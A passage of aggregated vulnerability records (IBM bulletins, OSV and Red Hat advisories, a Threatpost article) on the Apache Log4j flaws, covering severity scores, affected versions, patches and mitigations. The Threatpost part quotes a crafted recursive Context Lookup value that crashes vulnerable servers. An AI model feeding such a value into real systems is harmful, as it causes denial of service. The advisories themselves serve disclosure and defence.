OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSAE9L\",\"label\":\"Content Collector\"},\"Component\":\"Content Collector for Email\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"4.0.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T13:57:19", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects Content Collector for File Systems (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T13:57:19", "id": "7A36E54AFF586A013BFC64E0308098C6070D7FE82FD631B59758E4F661D42586", "href": "https://www.ibm.com/support/pages/node/6527814", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-01T21:54:40", "description": "## Summary\n\nIBM Security Verify Privilege Products NOT Affected by CVE-2021-44228 Exploit. \n\n## Vulnerability Details\n\nOEM partner ThycoticCentrify, after conducting extensive research product code base, it is determined that **none** of the products outlined below are using the vulnerable Java library `log4j` with JNDI exploit (CVE-2021-44228). Additionally, **none** of the products outlined below are built on the Java programming language, preventing the library to be present.\n\n * IBM Security Verify Privilege Vault\n * IBM Security Verify Privilege Manager\n * IBM Security Verify Privilege Account Lifecycle Manager\n * IBM Security Verify Privilege Behavior Analytics\n * IBM Security Verify Privilege DevOps Vault\n * IBM Security Verify Privilege Vault Remote\n * IBM Security Verify Privilege Server Suite\n\n### [](<https://docs.thycotic.com/bulletins/current/2021/cve-2021-44228-exploit.md#integrations>)\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\nhttps://docs.thycotic.com/bulletins/current/2021/cve-2021-44228-exploit.md\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-44228\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Type\":\"MASTER\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS2N2U\",\"label\":\"IBM Security Verify Privilege\"},\"ARM Category\":[],\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T13:37:26", "type": "ibm", "title": "Security Bulletin: IBM Security Verify Privilege Products NOT Affected by CVE-2021-44228 Exploit", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T13:37:26", "id": "1629CA1DFD389EEFF25556E8C9B707086E571E474449820E949D944C6EB994C3", "href": "https://www.ibm.com/support/pages/node/6525770", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-06-10T04:59:32", "description": "### Summary\nThe version used of Log4j, the library used for logging by PowerNukkit, is subject to a remote code execution vulnerability via the ldap JNDI parser.\nIt's well detailed at [CVE-2021-44228](https://github.com/advisories/GHSA-jfh8-c2jp-5v3q) and CVE-2021-45105(https://github.com/advisories/GHSA-p6xc-xr62-6r2g).\n\n### Impact\nMalicious client code could be used to send messages and cause remote code execution on the server.\n\n### Patches\nPowerNukkit `1.5.2.1` is a patch-release that only updates the Log4j version to `2.17.0` and should be used instead of `1.5.2.0`.\nAll versions prior to `1.5.2.1` are affected and are not patched.\n\n### Workarounds\nIf you can't upgrade, you can use the `-Dlog4j2.formatMsgNoLookups=true` startup argument as remediation, as this prevents the vulnerability from happening.\n\n### References\nhttps://github.com/advisories/GHSA-jfh8-c2jp-5v3q\nhttps://github.com/advisories/GHSA-p6xc-xr62-6r2g\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [the PowerNukkit repository](https://github.com/PowerNukkit/PowerNukkit/issues)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-06T18:31:23", "type": "osv", "title": "Remote code injection, Improper Input Validation and Uncontrolled Recursion in Log4j library", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45105"], "modified": "2022-06-10T02:15:59", "id": "OSV:GHSA-3QPM-H9CH-PX3C", "href": "https://osv.dev/vulnerability/GHSA-3qpm-h9ch-px3c", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-10T04:58:23", "description": "### Impact\nA highly critical 0-day exploit (CVE-2021-44228) is found in Apache log4j 2 library on December 9, 2021.\n\nThis affects Apache log4j versions from 2.0-beta9 to 2.14.1 (inclusive). \n\nThis vulnerability allows a remote attacker to execute code on the server if the system logs an attacker-controlled string value with the attacker's JNDI LDAP server lookup.\n\nAnother vulnerability related to the same library, which was discovered on 12/14/2021 (CVE-2021-45046) and revealed another Remote Code Execution vulnerability, has been investigated by Hazelcast team as well and it is found that it does not affect Hazelcast Products under default configurations. \n\nThe finding of CVE-2021-45105 on 12/14/2021, which can cause a Denial of Service attack, was investigated by Hazelcast team and it is confirmed that it does not affect Hazelcast Products under default configurations. \n\nThe finding of CVE-2021-44832 on 12/28/2021, which is a medium vulnerability, is investigated by our security team as well, and not considered to be as critical. It requires attacker to be able to modify logging configuration, which means attacker can modify the filesystem and/or can already execute arbitrary code which is more of a general security breach rather than something log4j specific.\n\nNote that Hazelcast IMDG and IMDG Enterprise itself is not affected.\n\nHowever, given version distributions are considered to be vulnerable since related ZIP and TGZ distributions contain a vulnerable Hazelcast Management Center version.\n\n### Patches\nCVE-2021-44228 is fixed in log4j 2.15.0.\nCVE-2021-45046 is fixed in log4j 2.16.0.\nCVE-2021-45105 is fixed in log4j 2.17.0.\nCVE-2021-44832 is fixed in log4j 2.17.1.\n\nAs of 12/21/2021, Hazelcast team has released a new version of all affected products that upgrades log4j to 2.17.0 as listed below: \nHazelcast Management Center 4.2021.12-1, Hazelcast Management Center 5.0.4.\nHazelcast IMDG and IMDG Enterprise 4.0.5, 4.1.8 and 4.2.4.\nHazelcast Jet 4.5.3.\nHazelcast Platform 5.0.2.\n\nAs of 01/06/2022, Hazelcast Management Center 4.2022.01 with the updated log4j 2.17.1 is released. log4j2.17.1 will be included in Management Center 5.1 that is expected to be released in February. \n\nHazelcast recommends upgrading to the latest versions available.\n\n### Workarounds\nFor users that an upgrade is not an option, below mitigations can be applied.\n\n#### Disabling lookups via Environment Variable \nSetting the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true .\nThis option is the easiest to apply for containerized environments.\n\n#### Disabling lookups in log4j2 configuration\nAnother good option since there is no need to replace JARs or no need to modify logging configuration file, users who cannot upgrade to 2.17.0 can mitigate the exposure by:\n\nUsers of Log4j 2.10 or greater may add `-Dlog4j2.formatMsgNoLookups=true `as a command line option or add `-Dlog4j2.formatMsgNoLookups=true` in a `log4j2.component.properties` file on the classpath to prevent lookups in log event messages.\nUsers since Log4j 2.7 may specify `%m{nolookups}` in the PatternLayout configuration to prevent lookups in log event messages.\nAs an example; users deploying Hazelcast Management Center via helm charts can do the following to disable lookups and restart in one command:\n\n`helm upgrade <release-name> hazelcast/hazelcast --set mancenter.javaOpts=\"<javaOpts> -Dlog4j2.formatMsgNoLookups=true\"`\n\nWhere <release-name> is the release name and <javaOpts> is existing java options user has added previously.\n\n#### Removing the JndiLookup from classpath\nRemove the JndiLookup and JndiManager classes from the log4j-core jar. Note that removal of the JndiManager will cause the JndiContextSelector and JMSAppender to no longer function.\n\n### References\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-44228\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-45046\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-44832\nhttps://logging.apache.org/log4j/2.x/index.html\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [our repo](https://github.com/hazelcast/hazelcast)\n* Slack us at [Hazelcast Community Slack](https://slack.hazelcast.com/)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-21T23:25:04", "type": "osv", "title": "Security Advisory for \"Log4Shell\"", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-06-10T02:16:37", "id": "OSV:GHSA-V57X-GXFJ-484Q", "href": "https://osv.dev/vulnerability/GHSA-v57x-gxfj-484q", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-10T05:01:44", "description": "Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0 and 2.12.3.\n\n\n# Affected packages\nOnly the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-18T18:00:07", "type": "osv", "title": "Improper Input Validation and Uncontrolled Recursion in Apache Log4j2", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45105"], "modified": "2022-06-10T02:14:08", "id": "OSV:GHSA-P6XC-XR62-6R2G", "href": "https://osv.dev/vulnerability/GHSA-p6xc-xr62-6r2g", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-04T05:04:23", "description": "\nIt was found that Apache Log4j2, a Logging Framework for Java, did not protect\nfrom uncontrolled recursion from self-referential lookups. When the logging\nconfiguration uses a non-default Pattern Layout with a Context Lookup (for\nexample, $${ctx:loginId}), attackers with control over Thread Context Map (MDC)\ninput data can craft malicious input data that contains a recursive lookup,\nresulting in a denial of service.\n\n\nFor the oldstable distribution (buster), this problem has been fixed\nin version 2.17.0-1~deb10u1.\n\n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 2.17.0-1~deb11u1.\n\n\nWe recommend that you upgrade your apache-log4j2 packages.\n\n\nFor the detailed security status of apache-log4j2 please refer to\nits security tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/apache-log4j2](https://security-tracker.debian.org/tracker/apache-log4j2)\n\n\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-18T00:00:00", "type": "osv", "title": "apache-log4j2 - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45105"], "modified": "2022-07-04T02:01:08", "id": "OSV:DSA-5024-1", "href": "https://osv.dev/vulnerability/DSA-5024-1", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "redhatcve": [{"lastseen": "2022-07-02T11:05:06", "description": "A flaw was found in the Apache Log4j logging library 2.x. when the logging configuration uses a non-default Pattern Layout with a Context Lookup. Attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup and can cause Denial of Service.\n#### Mitigation\n\nFor Log4j 2 versions up to and including 2.16.0, this flaw can be mitigated by: \n\\- In PatternLayout in the Log4j logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC) like %X{loginId}. \n\\- Otherwise, in the Log4j logging configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-30T13:07:43", "type": "redhatcve", "title": "CVE-2021-45105", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45105"], "modified": "2022-07-02T10:15:38", "id": "RH:CVE-2021-45105", "href": "https://access.redhat.com/security/cve/cve-2021-45105", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-12-20T16:11:34", "description": "No, you\u2019re not seeing triple: On Friday, Apache released yet another patch \u2013 [version 2.17](<https://logging.apache.org/log4j/2.x/download.html>) \u2013 for yet another flaw in the ubiquitous log4j logging library, this time for a DoS bug.\n\nTrouble comes in threes, and this is the third one for log4j. The latest bug isn\u2019t a variant of the Log4Shell remote-code execution (RCE) bug that\u2019s plagued IT teams since Dec. 10, coming [under active attack](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) [worldwide](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>) within hours of its public disclosure, spawning [even nastier mutations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) and leading to the [potential for denial-of-service](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) (DoS) in Apache\u2019s initial patch.\n\nIt does have similarities, though: The new bug affects the same component as the Log4Shell bug. Both the Log4Shell, tracked as [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (criticality rating of CVSS 10.0) and the new bug, tracked as [CVE-2021-45105](<https://nvd.nist.gov/vuln/detail/CVE-2021-45105>) (CVSS score: 7.5) abuse attacker-controlled lookups in logged data.\n\nThe difference: The lookups in the new bug, CVE-2021-45105, are Context Map lookups instead of the Java Naming and Directory Interface (JNDI) lookups to an LDAP server that allow attackers to execute any code that\u2019s returned in the Log4Shell vulnerability.\n\nContextMapLookup allows applications to store data in the Log4j ThreadContext Map and then retrieve the values in the Log4j configuration: For example, an app would store the current user\u2019s login id in the ThreadContext Map with the key \u201cloginId\u201d.\n\nThe weakness has to do with improper input validation and uncontrolled recursion that can lead to DoS.\n\nAs [explained](<https://www.zerodayinitiative.com/blog/2021/12/17/cve-2021-45105-denial-of-service-via-uncontrolled-recursion-in-log4j-strsubstitutor>) by Guy Lederfein of the Trend Micro Research Team, \u201cthe Apache Log4j API supports variable substitution in lookups. However, a crafted variable can cause the application to crash due to uncontrolled recursive substitutions. An attacker with control over lookup commands (e.g., via the Thread Context Map) can craft a malicious lookup variable, which results in a Denial-of-Service (DoS) attack.\u201d\n\nThe new vulnerability affects all versions of the tool from 2.0-beta9 to 2.16, which Apache shipped last week to remediate the [second flaw](<https://threatpost.com/new-log4shell-attack-vector-local-hosts/177128/>) in the trio. That second bug was the RCE flaw [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>), which, in turn, stemmed from Apache\u2019s [incomplete fix](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) for [CVE-2021-44228](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>), aka the Log4Shell vulnerability.\n\nLederfein continued: \u201cWhen a nested variable is substituted by the StrSubstitutor class, it recursively calls the substitute() class. However, when the nested variable references the variable being replaced, the recursion is called with the same string. This leads to an infinite recursion and a DoS condition on the server. As an example, if the Pattern Layout contains a Context Lookup of ${ctx.apiversion}, and its assigned value is ${${ctx.apiversion}}, the variable will be recursively substituted with itself.\u201d\n\nThe vulnerability has been tested and confirmed on Log4j versions up to and including 2.16, he said.\n\nApache has listed mitigating factors, but ZDI recommends upgrading to the latest version to ensure that the bug is completely addressed.\n\nThe latest bug and Apache\u2019s new round of fixes are just the latest news in the ongoing, ever-shifting log4j situation. As exploits flood in, new vulnerabilities emerge and patches turn out to need patching, huge tech players [such as SAP](<https://threatpost.com/sap-log4shell-vulnerability-apps/177069/>) have been hurrying to hunt down the logging library and to release product patches.\n\n## CISA Mandates Immediate Patching\n\nOn Thursday, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an [emergency directive](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache>) mandating federal civilian departments and agencies to immediately patch their internet-facing systems for the Log4j vulnerabilities by Thursday, Dec. 23.\n\nThe risk presented by the library\u2019s vulnerabilities is sky-high, as multiple threat actors have jumped on the opportunities to exploit vulnerable systems. As Check Point Research (CPR) [highlighted](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>) last week, real-life attacks have included a crypto-mining group that launched attacks in five countries.\n\nLast week, Microsoft reported that nation-state groups Phosphorus (Iran) and [Hafnium](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) (China), as well as unnamed APTs from North Korea and Turkey, are actively exploiting Log4Shell in targeted attacks. Hafnium is known for targeting Exchange servers with the ProxyLogon zero-days back in March, while Phosphorus \u2013 aka [Charming Kitten](<https://threatpost.com/charming-kitten-whatsapp-linkedin-effort/158813/>), APT35, Ajax Security Team, NewsBeef and Newscaster \u2013 [made headlines](<https://threatpost.com/microsoft-iranian-apt-t20-summit-munich-security-conference/160654/>) for targeting global summits and conferences in 2020.\n\nCPR said that Charming Kitten had gone after seven Israeli targets as of Wednesday.\n\n## Conti Ransomware Gang Is Among the Attackers\n\nThe Conti ransomware gang is in on it too: AdvIntel researchers said last week that they\u2019re seen Conti operators going after VMware vCenter.\n\n\u201cThe current exploitation led to multiple use cases through which the Conti group tested the possibilities of utilizing the Log4j 2 exploit,\u201d the researchers [said](<https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement>) last week. \u201cThe criminals pursued targeting specific vulnerable [Log4j 2 VMware vCenter](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) [servers] for lateral movement directly from the compromised network resulting in vCenter access affecting U.S. and European victim networks from the pre-existent Cobalt Strike sessions.\u201d\n\nLast week, a ransomware attack that some suspect may be attributable to the [Conti gang](<https://threatpost.com/conti-ransomware-backups/175114/>) forced a family-run chain of restaurants, hotels and breweries, [McMenamins](<https://www.mcmenamins.com/>), to [shut down some operations.](<https://threatpost.com/conti-gang-ransomware-attack-mcmenamins/177119/>)\n\nThe bugs are also being leveraged by botnets, remote access trojans (RATs), initial access brokers, and a new ransomware strain called Khonsari. As of Monday, CPR said that it\u2019s seen more than 4.3 million attempted exploits, more than 46 percent of which were made by \u201cknown malicious groups.\u201d\n\n## Yet More Sleepless Nights\n\nTrend Micro\u2019s Lederfein noted that the log4j component has had quite a run in the vulnerability spotlight, having received \u201cquite a bit of attention\u201d since the Log4Shell vulnerability was revealed 10 days ago. Expect more of the same, he predicted, as \u201cit would not be a surprise to see further bugs disclosed \u2013 with or without a patch.\u201d\n\nTom Garrubba, CISO with Shared Assessments, concurred: \u201cThis vulnerability has been keeping a lot of security professionals up at night,\u201d he told Threatpost. This Javageddon has even percolated up to the C-suite, he said, with the vulnerability \u201ckeeping a lot of security professionals up at night.\u201d\n\n\u201cExecutives and board members are also gaining interest as to how this will affect them as well,\u201d he said via email. \u201cLog4j is used all throughout the Internet and [affects] multiple applications and systems with deep roots.\u201d\n\n\u201cThe best path you can take right now it\u2019s a stay alert of all patches that are coming out to address this vulnerability and put them into place immediately,\u201d Garrubba advised. \u201cSadly, it appears this is going to affect organization\u2019s continuously into the future as they identify more items that are affected by this vulnerability.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T16:01:57", "type": "threatpost", "title": "Third Log4J Bug Can Trigger DoS; Apache Issues Patch", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-20T16:01:57", "id": "THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54", "href": "https://threatpost.com/third-log4j-bug-dos-apache-patch/177159/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T17:33:05", "description": "Cyberattackers are targeting uninterruptible power supply (UPS) devices, which provide battery backup power during power surges and outages. UPS devices are usually used in mission-critical environments, safeguarding critical infrastructure installations and important computer systems and IT 